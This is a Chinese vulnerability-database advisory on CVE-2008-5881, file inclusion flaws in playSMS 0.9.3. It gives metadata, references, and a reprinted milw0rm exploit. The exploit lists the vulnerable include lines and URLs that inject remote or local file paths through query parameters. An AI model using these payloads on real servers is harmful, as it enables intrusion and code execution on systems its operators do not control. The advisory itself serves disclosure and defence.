playSMS 多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117200 漏洞类型 路径遍历
发布时间 2009-01-06 更新时间 2009-01-29
CVE编号 CVE-2008-5881 CNNVD-ID CNNVD-200901-091
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7687
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-091
|漏洞详情
AntonRaharjaPlaySMS是SMS网关应用处理用于处理单个或广播SMS消息。playSMS存在多个目录遍历漏洞。远程攻击者可以通过(1)plugin/gateway/gnokii/init.php的gateway_module参数和(2)plugin/themes/default/init.php的themes_module参数的目录遍历符序列,包含和运行任意的本地文件。
|漏洞EXP
==:RFI/LFI:==


=====================
script:playsms 0.9.3

==========================================================================
download from:http://downloads.sourceforge.net/playsms/playsms-0.9.3.tar.gz?modtime=1211284086&big_mirror=0
   
==========================================================================
vul1: /plugin/gateway/gnokii/init.php lin 2 , 3;

2 include "$apps_path[plug]/gateway/$gateway_module/config.php";
3 include "$apps_path[plug]/gateway/$gateway_module/fn.php";

==========================================================================
vul2: /plugin/themes/default/init.php lin 2 , 3;

2 include $apps_path[themes]."/".$themes_module."/config.php";
3 include $apps_path[themes]."/".$themes_module."/fn.php";

==========================================================================
vul3: /lib/function.php lin 4 and...

lin4 include "$apps_path[libs]/fn_auth.php";

==========================================================================

xpl:
http://127.0.0.1/path/plugin/gateway/gnokii/init.php?apps_path[plug]=[Rfi]?
http://127.0.0.1/path/plugin/gateway/gnokii/init.php?gateway_module=[Lfi]

http://127.0.0.1/path/plugin/themes/default/init.php?apps_path[themes]=[Rfi]?
http://127.0.0.1/path/plugin/themes/default/init.php?themes_module=[Lfi]

http://127.0.0.1/path/lib/function.php?apps_path[libs]=[Rfi]?
==========================================================================
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
---------------------------------------------------

# milw0rm.com [2009-01-06]
|参考资料

来源:BID
名称:33138
链接:http://www.securityfocus.com/bid/33138
来源:MILW0RM
名称:7687
链接:http://www.milw0rm.com/exploits/7687
来源:SREASON
名称:4888
链接:http://securityreason.com/securityalert/4888
来源:SECUNIA
名称:33386
链接:http://secunia.com/advisories/33386